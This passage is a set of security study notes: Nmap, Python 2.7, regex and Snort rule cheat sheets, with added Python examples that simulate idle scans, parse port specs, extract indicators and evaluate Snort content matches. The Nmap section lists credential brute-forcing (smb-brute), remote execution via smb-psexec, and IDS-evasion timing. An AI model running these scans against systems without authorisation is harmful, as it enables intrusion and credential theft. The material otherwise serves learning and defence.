FTP bounce attack (-b): a closed port results in the FTP server informing the source station that the FTP server can't build the connection. An open port completes the transfer over the specified connection.

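Worked example (added to these notes; not Nmap's implementation): the three-step idlescan exchange above, simulated with both sides in Python so the IPID arithmetic can be watched. The zombie answers an unsolicited SYN/ACK with a RST and ignores incoming RSTs; the target replies to the spoofed source, which is the zombie. The class and function names, the starting IPID and the port sets are assumptions made for the example, and the IPID difference is computed modulo 2^16 so that a counter wrapping past 65535 is handled.

```python
class Zombie:
    """An idle host whose IP ID counter is global and increments by one per
    packet it sends, the property idle scan depends on."""

    def __init__(self, ipid=1000):
        self.ipid = ipid

    def emit(self):
        """Any packet the zombie sends consumes one IP ID (16-bit, wraps)."""
        self.ipid = (self.ipid + 1) & 0xFFFF
        return self.ipid

    def receive(self, segment):
        # An unsolicited SYN/ACK is answered with a RST (costs one IP ID);
        # an incoming RST is dropped silently, so it costs nothing.
        if segment["flags"] == "SYN/ACK":
            return {"flags": "RST", "ipid": self.emit()}
        return None


class Target:
    """Open ports SYN/ACK, closed ports RST, firewalled ports drop silently.
    Replies go to the segment's (spoofed) source address, i.e. the zombie."""

    def __init__(self, open_ports=(), filtered_ports=()):
        self.open_ports = set(open_ports)
        self.filtered_ports = set(filtered_ports)

    def receive(self, segment, zombie):
        if segment["flags"] != "SYN" or segment["dport"] in self.filtered_ports:
            return
        reply = "SYN/ACK" if segment["dport"] in self.open_ports else "RST"
        zombie.receive({"flags": reply})


def probe_zombie(zombie):
    """Steps 1 and 3: SYN/ACK to the zombie, read the IP ID off its RST."""
    return zombie.receive({"flags": "SYN/ACK"})["ipid"]


def idle_scan(zombie, target, port, background_packets=0):
    """The three-step exchange. background_packets models other traffic the
    zombie sends meanwhile, which is what makes a busy zombie useless."""
    before = probe_zombie(zombie)                                              # step 1
    target.receive({"flags": "SYN", "dport": port, "src": "zombie"}, zombie)   # step 2, spoofed
    for _ in range(background_packets):
        zombie.emit()
    after = probe_zombie(zombie)                                               # step 3
    delta = (after - before) & 0xFFFF                                          # wrap-safe
    if delta == 2:
        return "open"             # zombie RST'd the target's SYN/ACK, then our probe
    if delta == 1:
        return "closed|filtered"  # only our probe was answered; RST or silence cost nothing
    return f"unreliable (IP ID moved by {delta}; zombie is not idle)"


if __name__ == "__main__":
    target = Target(open_ports={22}, filtered_ports={135})
    for port in (22, 80, 135):
        print(port, idle_scan(Zombie(), target, port))
    print(22, idle_scan(Zombie(), target, 22, background_packets=5))
```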


Nmap Cheat Sheet v1.0
POCKET REFERENCE GUIDE, SANS Institute, http://www.sans.org

Target Specification
IPv4 address:                    192.168.1.1
IPv6 address:                    AABB:CCDD::FF%eth0
Host name:                       www.target.tgt
IP address range:                192.168.0-255.0-255
CIDR block:                      192.168.0.0/16
Use file with lists of targets:  -iL <filename>

Target Ports
No port range specified   Scans the 1,000 most popular ports
-F                        Scan 100 most popular ports
-p<port1>-<port2>         Port range
-p<port1>,<port2>,...     Port list
-pU:53,U:110,T:20-445     Mix TCP and UDP (a T: or U: qualifier applies to the ports that follow it until the next qualifier)
-r                        Scan linearly (do not randomize ports)
--top-ports <n>           Scan n most popular ports
-p-65535                  Leaving off initial port in range makes Nmap scan start at port 1
-p0-                      Leaving off end port in range makes Nmap scan through port 65535
-p-                       Scan ports 1-65535
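Worked example (added to these notes; not Nmap's own parser): a parser for the -p port syntax listed above, including the cases the sheet calls out, an omitted start (-65535) or end (0-), a bare '-' for 1-65535, and T:/U: qualifiers mixing TCP and UDP. The function name and the rule that a qualifier stays in force for the elements that follow it are assumptions made for the example; out-of-range and reversed ranges are rejected rather than silently clamped.

```python
def parse_port_spec(spec, max_port=65535):
    """Expand an nmap -p value into {'T': set of TCP ports, 'U': set of UDP ports}.

    A range with no start begins at 1 ('-65535'), one with no end runs to
    65535 ('0-'), and '-' alone is 1-65535. A 'T:' or 'U:' prefix selects the
    protocol for that element and every following one until the next prefix;
    with no prefix at all the ports apply to both protocols.
    """
    ports = {"T": set(), "U": set()}
    protos = ("T", "U")
    for element in spec.split(","):
        element = element.strip()
        if len(element) > 1 and element[1] == ":":
            proto = element[0].upper()
            if proto not in ports:
                raise ValueError(f"unknown protocol qualifier {element[:2]!r}")
            protos, element = (proto,), element[2:]
        if not element:
            raise ValueError("empty port element in spec")
        if "-" in element:
            lo_s, hi_s = element.split("-", 1)
            lo = int(lo_s) if lo_s else 1          # '-N'  -> start at 1
            hi = int(hi_s) if hi_s else max_port   # 'N-'  -> run to 65535
        else:
            lo = hi = int(element)                 # single port
        if not 0 <= lo <= hi <= max_port:
            raise ValueError(f"range {element!r} is reversed or outside 0-{max_port}")
        for proto in protos:
            ports[proto].update(range(lo, hi + 1))
    return ports


def summarize(ports):
    """Count of TCP and UDP ports a spec expands to, for a quick sanity check."""
    return {proto: len(values) for proto, values in ports.items()}


if __name__ == "__main__":
    for spec in ("-", "0-", "-65535", "U:53,U:110,T:20-445", "22,80,443"):
        print(f"{spec:24} {summarize(parse_port_spec(spec))}")
```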

Scripting Engine
-sC                                                     Run default scripts
--script=<ScriptName>|<ScriptCategory>|<ScriptDir>...   Run individual or groups of scripts
--script-args=<Name1=Value1,...>                        Use the list of script arguments
--script-updatedb                                       Update script database

Notable Scripts
A full list of Nmap Scripting Engine scripts is available at http://nmap.org/nsedoc/

Some particularly useful scripts include:

dns-zone-transfer: Attempts to pull a zone file (AXFR) from a DNS server.
$ nmap --script dns-zone-transfer.nse --script-args dns-zone-transfer.domain=<domain> -p53 <hosts>

http-robots.txt: Harvests robots.txt files from discovered web servers.
$ nmap --script http-robots.txt <hosts>

smb-brute: Attempts to determine valid username and password combinations via automated guessing.
$ nmap --script smb-brute.nse -p445 <hosts>

smb-psexec: Attempts to run a series of programs on the target machine, using credentials provided as script-args.
$ nmap --script smb-psexec.nse --script-args=smbuser=<username>,smbpass=<password>[,config=<config>] -p445 <hosts>

Script Categories
Nmap's script categories include, but are not limited to, the following:
auth:       Utilize credentials or bypass authentication on target hosts.
broadcast:  Discover hosts not included on command line by broadcasting on local network.
brute:      Attempt to guess passwords on target systems, for a variety of protocols, including http, SNMP, IAX, MySQL, VNC, etc.
default:    Scripts run automatically when -sC or -A are used.
discovery:  Try to learn more information about target hosts through public sources of information, SNMP, directory services, and more.
dos:        May cause denial of service conditions in target hosts.
exploit:    Attempt to exploit target systems.
external:   Interact with third-party systems not included in target list.
fuzzer:     Send unexpected input in network protocol fields.
intrusive:  May crash target, consume excessive resources, or otherwise impact target machines in a malicious fashion.
malware:    Look for signs of malware infection on the target hosts.
safe:       Designed not to impact target in a negative fashion.
version:    Measure the version of software or protocol spoken by target hosts.
vuln:       Measure whether target systems have a known vulnerability.

Base Syntax
# nmap [ScanType] [Options] {targets}


Scan Types
-sP           Probe only (host discovery, not port scan)
-sS           SYN Scan
-sT           TCP Connect Scan
-sU           UDP Scan
-sV           Version Scan
-O            OS Detection
--scanflags   Set custom list of TCP flags using URG ACK PSH RST SYN FIN in any order

Probing Options
-Pn              Don't probe (assume all hosts are up)
-PB              Default probe (TCP 80, 445 & ICMP)
-PS<portlist>    Check whether targets are up by probing TCP ports
-PE              Use ICMP Echo Request
-PP              Use ICMP Timestamp Request
-PM              Use ICMP Netmask Request

Fine-Grained Timing Options
--min-hostgroup/max-hostgroup <size>                           Parallel host scan group sizes
--min-parallelism/max-parallelism <numprobes>                  Probe parallelization
--min-rtt-timeout/max-rtt-timeout/initial-rtt-timeout <time>   Specifies probe round trip time
--max-retries <tries>                                          Caps number of port scan probe retransmissions
--host-timeout <time>                                          Give up on target after this long
--scan-delay/--max-scan-delay <time>                           Adjust delay between probes
--min-rate <number>                                            Send packets no slower than <number> per second
--max-rate <number>                                            Send packets no faster than <number> per second

Aggregate Timing Options
-T0   Paranoid: Very slow, used for IDS evasion
-T1   Sneaky: Quite slow, used for IDS evasion
-T2   Polite: Slows down to consume less bandwidth, runs ~10 times slower than default
-T3   Normal: Default, a dynamic timing model based on target responsiveness
-T4   Aggressive: Assumes a fast and reliable network and may overwhelm targets
-T5   Insane: Very aggressive; will likely overwhelm targets or miss open ports

Output Formats
-oN              Standard Nmap output
-oG              Greppable format
-oX              XML format
-oA <basename>   Generate Nmap, Greppable, and XML output files using basename for files

Misc Options
-n         Disable reverse IP address lookups
-6         Use IPv6 only
-A         Use several features, including OS Detection, Version Detection, Script Scanning (default), and traceroute
--reason   Display reason Nmap thinks port is open, closed, or filtered


Python 2.7 Quick Reference Sheet
ver 2.01  110105 (sjd)

Interactive Help in Python Shell
help()     Invoke interactive help
help(m)    Display help for module m
help(f)    Display help for function f
dir(m)     Display names in module m

Small Operator Precedence Table (highest first)
func_name(args, ...)      Function call
x[index : index]          Slicing
x[index]                  Indexing
x.attribute               Attribute reference
**                        Exponentiation
*, /, %                   Multiply, divide, mod
+, -                      Add, subtract
>, <, <=, >=, !=, ==      Comparison
in, not in                Membership tests
not, and, or              Boolean operators NOT, AND, OR

Module Import
import module_name
from module_name import name, ...
from module_name import *

Common Data Types
Type     Description             Literal example
int      32-bit Integer          3, -4
long     Integer > 32 bits       101L
float    Floating point number   3.0, -6.55
complex  Complex number          1.2J
bool     Boolean                 True, False
str      Character sequence      "Python"
tuple    Immutable sequence      (2, 4, 7)
list     Mutable sequence        [2, x, 3.1]
dict     Mapping                 { x:2, y:5 }

Common Syntax Structures
Assignment Statement
    var = exp
Console Input/Output
    var = input( [prompt] )
    var = raw_input( [prompt] )
    print exp[,]
Selection
    if (boolean_exp):
        stmt
    [elif (boolean_exp):
        stmt]
    [else:
        stmt]
Repetition
    while (boolean_exp):
        stmt
Traversal
    for var in traversable_object:
        stmt
Function Definition
    def function_name( parameters ):
        stmt
Function Call
    function_name( arguments )
Class Definition
    class Class_name [ (super_class) ]:
        [ class variables ]
        def method_name( self, parameters ):
            stmt
Object Instantiation
    obj_ref = Class_name( arguments )
Method Invocation
    obj_ref.method_name( arguments )
Exception Handling
    try:
        stmt
    except [exception_type] [, var]:
        stmt

Common Built-in Functions
Function      Returns
abs(x)        Absolute value of x
dict()        Empty dictionary, eg: d = dict()
float(x)      int or string x as float
id(obj)       memory addr of obj
int(x)        float or string x as int
len(s)        Number of items in sequence s
list()        Empty list, eg: m = list()
max(s)        Maximum value of items in s
min(s)        Minimum value of items in s
open(f)       Open filename f for input
ord(c)        ASCII code of c
pow(x,y)      x ** y
range(x)      A list of x ints 0 to x - 1
round(x,n)    float x rounded to n places
str(obj)      str representation of obj
sum(s)        Sum of numeric sequence s
tuple(items)  tuple of items
type(obj)     Data type of obj

Common Math Module Functions
Function         Returns (all float)
ceil(x)          Smallest whole nbr >= x
cos(x)           Cosine of x radians
degrees(x)       x radians in degrees
radians(x)       x degrees in radians
exp(x)           e ** x
floor(x)         Largest whole nbr <= x
hypot(x, y)      sqrt(x * x + y * y)
log(x [, base])  Log of x to base, or natural log if base not given
pow(x, y)        x ** y
sin(x)           Sine of x radians
sqrt(x)          Positive square root of x
tan(x)           Tangent of x radians
pi               Math constant pi to 15 sig figs
e                Math constant e to 15 sig figs


Common String Methods
S.method()                 Returns (str unless noted)
capitalize()               S with first char uppercase
center(w)                  S centered in str w chars wide
count(sub)                 int nbr of non-overlapping occurrences of sub in S
find(sub)                  int index of first occurrence of sub in S, or -1 if not found
isdigit()                  bool True if S is all digit chars, False otherwise
islower() isupper()        bool True if S is all lower/upper case chars, False otherwise
join(seq)                  All items in seq concatenated into a str, delimited by S
lower() upper()            Lower/upper case copy of S
lstrip() rstrip() strip()  Copy of S with leading / trailing whitespace removed, or both
split([sep])               List of tokens in S, delimited by sep; if sep not given, delimiter is any whitespace

Formatting Numbers as Strings
Syntax: format_spec % numeric_exp
format_spec syntax: % width.precision type
width (optional): align in number of columns specified; negative to left-align, precede with 0 to zero-fill
precision (optional): show specified digits of precision for floats; 6 is default
type (required): d (decimal int), f (float), s (string), e (float exponential notation)
Examples for x = 123, y = 456.789 (each . marks a padding space):
'%6d' % x         ->  . . . 123
'%06d' % x        ->  000123
'%8.2f' % y       ->  . . 456.79
'%.2e' % y        ->  4.57e+02
'%-8s' % 'Hello'  ->  Hello . . .

Common List Methods
L.method()     Result/Returns
append(obj)    Append obj to end of L
count(obj)     Returns int nbr of occurrences of obj in L
index(obj)     Returns index of first occurrence of obj in L; raises ValueError if obj not in L
pop([index])   Returns item at specified index, or item at end of L if index not given; raises IndexError if L is empty or index is out of range
remove(obj)    Removes first occurrence of obj from L; raises ValueError if obj is not in L
reverse()      Reverses L in place
sort()         Sorts L in place

Common Tuple Methods
T.method()     Returns
count(obj)     Returns nbr of occurrences of obj in T
index(obj)     Returns index of first occurrence of obj in T; raises ValueError if obj is not in T

Common Dictionary Methods
D.method()     Result/Returns
clear()        Remove all items from D
get(k [,val])  Return D[k] if k in D, else val
has_key(k)     Return True if k in D, else False
items()        Return list of key-value pairs in D; each list item is a 2-item tuple
keys()         Return list of D's keys
pop(k [,val])  Remove key k, return mapped value, or val if k not in D
values()       Return list of D's values

Common File Methods
F.method()     Result/Returns
read([n])      Return str of next n chars from F, or up to EOF if n not given
readline([n])  Return str up to next newline, or at most n chars if specified
readlines()    Return list of all lines in F, where each item is a line
write(s)       Write str s to F
writelines(L)  Write all str in seq L to F
close()        Closes the file

Other Syntax
Hold window for user keystroke to close:
    raw_input("Press <Enter> to quit.")
Prevent execution on import:
    if __name__ == "__main__":
        main()

Displayable ASCII Characters
 32 SP   33 !    34 "    35 #    36 $    37 %    38 &    39 '
 40 (    41 )    42 *    43 +    44 ,    45 -    46 .    47 /
 48 0    49 1    50 2    51 3    52 4    53 5    54 6    55 7
 56 8    57 9    58 :    59 ;    60 <    61 =    62 >    63 ?
 64 @    65 A    66 B    67 C    68 D    69 E    70 F    71 G
 72 H    73 I    74 J    75 K    76 L    77 M    78 N    79 O
 80 P    81 Q    82 R    83 S    84 T    85 U    86 V    87 W
 88 X    89 Y    90 Z    91 [    92 \    93 ]    94 ^    95 _
 96 `    97 a    98 b    99 c   100 d   101 e   102 f   103 g
104 h   105 i   106 j   107 k   108 l   109 m   110 n   111 o
112 p   113 q   114 r   115 s   116 t   117 u   118 v   119 w
120 x   121 y   122 z   123 {   124 |   125 }   126 ~   127 DEL
Newline \n = 10


Regular Expressions (Regex) Cheat Sheet

Special Characters in Regular Expressions & their meanings

Character  Meaning                                            Example
*          Match zero, one or more of the previous            Ah* matches "Ahhhhh" or "A"
?          Match zero or one of the previous                  Ah? matches "A" or "Ah"
+          Match one or more of the previous                  Ah+ matches "Ah" or "Ahhh" but not "A"
\          Used to escape a special character                 Hungry\? matches "Hungry?"
.          Wildcard character, matches any character          do.* matches "dog", "door", "dot", etc.
( )        Group characters                                   See example for |
[ ]        Matches one character from a set or range          [cbf]ar matches "car", "bar", or "far"
                                                              [0-9]+ matches any positive integer
                                                              [a-zA-Z] matches ascii letters a-z (uppercase and lower case)
                                                              [^0-9] matches any character not 0-9
|          Matches the expression on its left OR on its       (Mon|Tues)day matches "Monday" or "Tuesday"
           right; it binds loosest of all, so group it:       (Mon)|(Tues)day would match "Mon" or "Tuesday"
{ }        Matches a specified number of occurrences of       [0-9]{3} matches "315" but not "31"
           the previous                                       [0-9]{2,4} matches "12", "123", and "1234"
                                                              [0-9]{2,} matches "1234567..."
^          Beginning of a string. Or, within a character      ^http matches strings that begin with http, such as a url
           range [], negation                                 [^0-9] matches any character not 0-9
$          End of a string                                    ing$ matches "exciting" but not "ingenious"


Python 2.7 RegularExpressions

Non-special chars match themselves. Exceptions arespecial characters:

\ Escape special char or start a sequence.. Match any char except newline, see re.DOTALL^ Match start of the string, see re.MULTILINE$ Match end of the string, see re.MULTILINE[] Enclose a set of matchable charsR|S Match either regex R or regex S.() Create capture group, & indicate precedence

After '[', enclose a set, the only special chars are:

] End the set, if not the 1st char- A range, eg. a-c matches a, b or c^ Negate the set only if it is the 1st char

Quantifiers (append '?' for non-greedy):

{m} Exactly m repetitions{m,n} From m (default 0) to n (default infinity)* 0 or more. Same as {,}+ 1 or more. Same as {1,}? 0 or 1. Same as {,1}

Special sequences:

\A Start of string\b Match empty string at word (\w+) boundary\B Match empty string not at word boundary\d Digit\D Non-digit\s Whitespace [ \t\n\r\f\v], see LOCALE,UNICODE\S Non-whitespace\w Alphanumeric: [0-9a-zA-Z_], see LOCALE\W Non-alphanumeric\Z End of string\g<id> Match prev named or numbered group, '<' & '>' are literal, e.g. \g<0> or \g<name> (not \g0 or \gname)

Special character escapes are much like those alreadyescaped in Python string literals. Hence regex '\n' issame as regex '\\n':

\a ASCII Bell (BEL)\f ASCII Formfeed\n ASCII Linefeed\r ASCII Carriage return\t ASCII Tab\v ASCII Vertical tab\\ A single backslash\xHH Two digit hexadecimal character goes here\OOO Three digit octal char (or just use an initial zero, e.g. \0, \09)\DD Decimal number 1 to 99, match previous numbered group

Extensions. Do not cause grouping, except 'P<name>':

(?iLmsux) Match empty string, sets re.X flags(?:...) Non-capturing version of regular parens(?P<name>...) Create a named capturing group.(?P=name) Match whatever matched prev named group(?#...) A comment; ignored.(?=...) Lookahead assertion, match without consuming(?!...) Negative lookahead assertion(?<=...) Lookbehind assertion, match if preceded(?<!...) Negative lookbehind assertion(?(id)y|n) Match 'y' if group 'id' matched, else 'n'

Flags for re.compile(), etc. Combine with '|':

re.I == re.IGNORECASE Ignore casere.L == re.LOCALE Make \w, \b, and \s locale dependentre.M == re.MULTILINE Multilinere.S == re.DOTALL Dot matches all (including newline)re.U == re.UNICODE Make \w, \b, \d, and \s unicode dependentre.X == re.VERBOSE Verbose (unescaped whitespace in pattern is ignored, and '#' marks comment lines)

Module level functions:

compile(pattern[, flags]) -> RegexObjectmatch(pattern, string[, flags]) -> MatchObjectsearch(pattner, string[, flags]) -> MatchObjectfindall(pattern, string[, flags]) -> list of stringsfinditer(pattern, string[, flags]) -> iter of MatchObjectssplit(pattern, string[, maxsplit, flags]) -> list of stringssub(pattern, repl, string[, count, flags]) -> stringsubn(pattern, repl, string[, count, flags]) -> (string, int)escape(string) -> stringpurge() # the re cache

RegexObjects (returned from compile()):

.match(string[, pos, endpos]) -> MatchObject

.search(string[, pos, endpos]) -> MatchObject

.findall(string[, pos, endpos]) -> list of strings

.finditer(string[, pos, endpos]) -> iter of MatchObjects

.split(string[, maxsplit]) -> list of strings

.sub(repl, string[, count]) -> string

.subn(repl, string[, count]) -> (string, int)

.flags # int, Passed to compile()

.groups # int, Number of capturing groups

.groupindex # {}, Maps group names to ints

.pattern # string, Passed to compile()

MatchObjects (returned from match() and search()):

.expand(template) -> string, Backslash & group expansion

.group([group1...]) -> string or tuple of strings, 1 per arg

.groups([default]) -> tuple of all groups, non-matching=default

.groupdict([default]) -> {}, Named groups, non-matching=default

.start([group]) -> int, Start/end of substring match by group

.end([group]) -> int, Group defaults to 0, the whole match

.span([group]) -> tuple (match.start(group), match.end(group))

.pos int, Passed to search() or match()

.endpos int, "

.lastindex int, Index of last matched capturing group

.lastgroup string, Name of last matched capturing group

.re regex, As passed to search() or match()

.string string, "
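The escapes, extensions, flags and MatchObject attributes above come together when pulling indicators out of free text. The following is an added worked example and not part of the cheat sheet: a verbose, named-group pattern with lookaround that extracts IPv4 addresses, hostnames and MD5 hashes from a constructed log message, a sub() callback that defangs them, and a whole-word search for an untrusted literal that goes through re.escape() so that metacharacters in the input cannot change the pattern. IOC_RE, SAMPLE and the function names are this example's own.

```python
import re

# Verbose pattern using the named groups, non-capturing group and lookaround
# assertions from the tables above. The lookbehind/lookahead keep a match from
# starting or ending inside a longer token (so "10.0.0.1.5" is not an IPv4
# match) while still allowing a sentence-ending '.' after the indicator.
IOC_RE = re.compile(r"""
    (?<![\w.-])                                 # nothing token-like just before
    (?:
        (?P<ipv4>(?:\d{1,3}\.){3}\d{1,3})       # dotted quad (no octet range check)
      | (?P<domain>(?:[a-z0-9-]+\.)+[a-z]{2,})  # labels followed by an alphabetic TLD
      | (?P<md5>[0-9a-f]{32})                   # 32 hex digits
    )
    (?!\.?[\w-])                                # not followed by more token text
""", re.VERBOSE | re.IGNORECASE)

# Constructed sample text (not a real log line).
SAMPLE = ("Beacon to c2.EVIL-example.net from 10.0.0.7, payload md5 "
          "d41d8cd98f00b204e9800998ecf8427e; also seen 198.51.100.23.")


def extract_iocs(text):
    """Return [(kind, value, (start, end))] for every indicator in text.

    m.lastgroup names the alternative that matched; that works here because the
    named groups are not nested (with nesting it would name the innermost group
    that closed last)."""
    return [(m.lastgroup, m.group(m.lastgroup), m.span())
            for m in IOC_RE.finditer(text)]


def defang(text):
    """sub() with a callable repl: each matched indicator gets its dots bracketed
    so the text can be pasted into a ticket without creating live links."""
    return IOC_RE.sub(lambda m: m.group(0).replace(".", "[.]"), text)


def contains_literal(text, needle):
    """Whole-word search for an untrusted literal.

    re.escape() is the important part: a needle of '.*' or '(' taken from user
    input would otherwise be parsed as regex syntax (a match-anything filter,
    a re.error, or a catastrophic-backtracking pattern)."""
    pattern = r"(?<!\w)" + re.escape(needle) + r"(?!\w)"
    return re.search(pattern, text, re.IGNORECASE) is not None


if __name__ == "__main__":
    for kind, value, span in extract_iocs(SAMPLE):
        print(f"{kind:6} {value} at {span}")
    print(defang(SAMPLE))
    print(contains_literal(SAMPLE, "10.0.0.7"), contains_literal(SAMPLE, ".*"))
```

The alternation order matters: the IPv4 branch is tried first so a dotted quad is never reported as a domain, and the trailing lookahead allows the sentence-ending period after 198.51.100.23 while rejecting a fifth octet.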

Gleaned from the python 2.7 're' docs: http://docs.python.org/library/re.html

https://github.com/tartley/python-regex-cheatsheet  Version: v0.3.3


Action    Function
alert     alerts and logs the event
log       logs the event
pass      ignores the event
drop      drops the packet and logs the event (inline mode)
reject    drops the packet, logs it, and sends a TCP reset for TCP sessions or an ICMP type 3 code 3 (port unreachable) for UDP traffic
sdrop     drops the packet without logging
activate  alerts and then turns on another (dynamic) rule
dynamic   remains idle until turned on by an activate rule, then acts as a log rule

Source/Destination Address    Meaning
any                           any address
A.B.C.D                       single IP
A.B.C.D/XX                    CIDR block
[A.B.C.D,A.B.C.E,A.B.C.G]     list (comma separated, no spaces): match ANY entry, not all
!A.B.C.D                      negation: anything except the address, block or list

Source/Destination Port       Meaning
any                           any port
N                             single port
N:M                           port range (N: means N and above, :M means M and below)
!N                            negation

Proto   Meaning
ip      any IP protocol (covers all)
tcp     TCP only
udp     UDP only
icmp    ICMP only

Direction Meaning

-> from SRC to DEST

<> in either direction

Header Format

Action Proto SRC SRC Port Direction DST DST Port

Modifier Function

nocase;       makes the previous content match case insensitive. Use it in most cases to allow for vendor implementation variations, but NOT when matching Base64 or URL-encoded content, where letter case is part of the data.

rawbytes;     ignores preprocessor interpretation (normalization) of the payload and looks for a match in the raw packet payload

offset:N;     starts the search N bytes from the beginning of the PAYLOAD. Example: offset:3;

depth:N;      limits the search to the first N bytes of the PAYLOAD (counted from the offset, if one is given); the pattern must fit entirely inside that window

distance:N;   starts the search N bytes after the end of the last CONTENT MATCH. Example: distance:12;

within:N;     limits the search to the N bytes following the end of the last CONTENT MATCH (after any distance); the pattern must fit entirely inside that window
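The four position modifiers are the ones most often written wrong, so here they are made concrete. This is an added example, not code from the cheat sheet or from Snort: find_content applies offset/depth from the start of the payload and distance/within from the end of the previous match, match_chain threads consecutive content: options together the way a rule body does, and DNS_PAYLOAD is a constructed DNS query (not captured traffic). The window model is this example's reading of the descriptions above: depth is counted from the offset, and within from the position after the distance.

```python
# Constructed DNS query payload (not captured traffic): 12-byte header, then the
# QNAME for foundit.com in wire form, then QTYPE=A and QCLASS=IN.
DNS_PAYLOAD = (b"\xab\xcd\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00"
               + b"\x07foundit\x03com\x00"
               + b"\x00\x01\x00\x01")


def find_content(payload, content, *, nocase=False, offset=0, depth=None,
                 distance=None, within=None, last_end=0):
    """Return the (start, end) span of the first match, or None.

    Window model assumed here (matching the modifier table above):
      absolute:  search payload[offset : offset + depth]
      relative:  search payload[last_end + distance : last_end + distance + within]
    A content with distance or within is relative to the end of the previous
    content match (last_end); otherwise offset/depth apply from the payload start.
    The pattern must fit entirely inside the window.
    """
    relative = distance is not None or within is not None
    lo = last_end + (distance or 0) if relative else offset
    length = within if relative else depth
    hi = len(payload) if length is None else min(len(payload), lo + length)
    window = payload[lo:hi]
    if nocase:
        # ASCII-only case folding. Do not use nocase for Base64 or URL-encoded
        # content, where letter case is part of the data.
        window, content = window.lower(), content.lower()
    idx = window.find(content)
    if idx < 0:
        return None
    return lo + idx, lo + idx + len(content)


def match_chain(payload, chain):
    """Evaluate an ordered list of (content, modifiers) like consecutive content:
    options in one rule, threading each match end into the next relative match.
    Returns the list of spans, or None as soon as one content fails."""
    spans, last_end = [], 0
    for content, mods in chain:
        span = find_content(payload, content, last_end=last_end, **mods)
        if span is None:
            return None
        spans.append(span)
        last_end = span[1]
    return spans


if __name__ == "__main__":
    # content:"|07|FOUNDIT|03|COM"; nocase;   -> the query name at bytes 12..24
    print(find_content(DNS_PAYLOAD, b"\x07FOUNDIT\x03COM", nocase=True))
    # content:"foundit"; content:"com"; distance:1; within:3;   -> both match
    print(match_chain(DNS_PAYLOAD, [(b"foundit", {}),
                                    (b"com", {"distance": 1, "within": 3})]))
    # within:2 leaves a two-byte window that "com" cannot fit in -> no match
    print(match_chain(DNS_PAYLOAD, [(b"foundit", {}),
                                    (b"com", {"distance": 1, "within": 2})]))
```

The last two calls show the off-by-one that bites in practice: within counts the bytes the pattern may occupy, so a three-byte pattern needs within:3 or more, not within:2.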

SNORT RULE CHEAT SHEET

Created by Dave Werden

Format of Snort rules: header (body;)

Example:

alert udp 10.10.10.10 any -> 10.10.10.11 53 (msg:"We got the DNS traffic"; content:"|07|foundit|03|com"; nocase; reference:url,someintel.google.com; classtype:attempted-recon; sid:5000000; rev:1;)

The |07| and |03| are the DNS label-length bytes, so the content is the wire form of a query for foundit.com; nocase is appropriate here because DNS names are case-insensitive.

2/8/2013


Basic Body Options

Operator   Options

msg:          ASCII text printed in the alert or log; must be in quotes, e.g. msg:"Yet another Scan";

reference:    attaches a link to external documentation for the rule, using a reference system defined in reference.config. Example using a CVE: reference:cve,1999-0105; example using a URL: reference:url,someintel.google.com;

sid:          Snort ID number. <100 is reserved, 100 to 999,999 is used by the rules shipped with Snort, 1,000,000 and above is for local/custom rules (other published rule sets, e.g. Emerging Threats, start at 2,000,000, so choose local sids that cannot collide)

rev:          revision of the snort rule

classtype:    a named class of attack; the built-in classes (classification.config) each carry a default priority. Names use hyphens, e.g. classtype:attempted-recon;

priority:     level of concern, overrides the classtype default: 1 = high, 2 = medium, 3 = low, 4 = very low

content:      searches the packet payload for either an ASCII string or a binary match; binary bytes are written as hex between pipes, e.g. content:"|07|foundit|03|com";

isdataat:     verifies that a certain number of bytes is present; can be made relative to the end of the previous content match by adding ,relative, e.g. isdataat:50,relative;

uricontent:   same as content, but applies specifically to the normalized URI (requires the HTTP preprocessor)

urilen:       specifies a particular length of URI, or a range of lengths. Requires the HTTP preprocessor

flow:         describes the state of the session and its directionality. Options: to_server, from_server, to_client, from_client, only_stream, no_stream, stateless, established

ipopts:       indicates the presence of option fields in the IP header. Options: eol (End of List), lsrr (Loose Source Routing), rr (Record Route), satid (Stream ID), sec (Security), ssrr (Strict Source Routing), ts (Time Stamp)

dsize:        tests the size, or size range, of the packet PAYLOAD (not the whole packet with headers), e.g. dsize:>1000; or dsize:300<>400;

flags:        tests the TCP flags. Flag letters: A (Ack), F (Fin), P (Push), R (Reset), S (Syn), U (Urgent), 0 (no flags set; used by the nmap null scan), 1 (reserved bit 1, the 0x80 bit, CWR), 2 (reserved bit 2, the 0x40 bit, ECE). Modifiers: + (the given flags plus any others), * (any of the given flags), ! (none of the given flags). Without a modifier the given flags must match exactly, so flags:S; matches a bare SYN.

ttl:          specifies a particular time-to-live value in the IP header, a decimal number between 0 and 255

tag:          logs a series of packets rather than just the one that triggered the rule; think of it as a trigger. tag largely replaces the activate/dynamic rule pair. Parameters: session (logs all packets in the session that triggered the rule), host (logs all packets to/from the host whose IP triggered the rule; this captures all traffic, not just that particular session, which is good for capturing botnet activity), count (how much to log, a decimal number), packets (log that many packets), seconds (log all packets for the session or host for that many seconds), src / dst (for host: use the source or the destination IP as the tagged host). Example: tag:session,30,seconds;
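To tie the header format, the option table and the example rule together, here is an added example (not code from the cheat sheet or from Snort) that parses the example rule above into header fields and ordered options, decodes the |hex| content notation into bytes, shows that |07|foundit|03|com is the wire form of the foundit.com query name, and runs the action, protocol, sid-range and required-option checks from the table. HEADER_RE, parse_rule, split_options, decode_content, dns_wire_name and lint are this example's own names, not Snort's API.

```python
import re

ACTIONS = {"alert", "log", "pass", "drop", "reject", "sdrop", "activate", "dynamic"}
PROTOS = {"ip", "tcp", "udp", "icmp"}

# header:  action proto src sport direction dst dport  ( body )
HEADER_RE = re.compile(r"""
    ^\s*(?P<action>\w+)\s+(?P<proto>\w+)\s+
    (?P<src>\S+)\s+(?P<sport>\S+)\s+(?P<direction>->|<>)\s+
    (?P<dst>\S+)\s+(?P<dport>\S+)\s*\((?P<body>.*)\)\s*$
""", re.VERBOSE | re.DOTALL)

# The sheet's example rule, with the option syntax as Snort expects it.
EXAMPLE_RULE = ('alert udp 10.10.10.10 any -> 10.10.10.11 53 '
                '(msg:"We got the DNS traffic"; content:"|07|foundit|03|com"; nocase; '
                'reference:url,someintel.google.com; classtype:attempted-recon; '
                'sid:5000000; rev:1;)')


def split_options(body):
    """Split the rule body on ';' outside double quotes into ordered
    (keyword, value) pairs; flag options such as nocase get value None."""
    options, current, quoted, prev = [], [], False, ""
    for ch in body:
        if ch == '"' and prev != "\\":
            quoted = not quoted
        if ch == ";" and not quoted:
            options.append("".join(current))
            current = []
        else:
            current.append(ch)
        prev = ch
    if "".join(current).strip():
        options.append("".join(current))
    pairs = []
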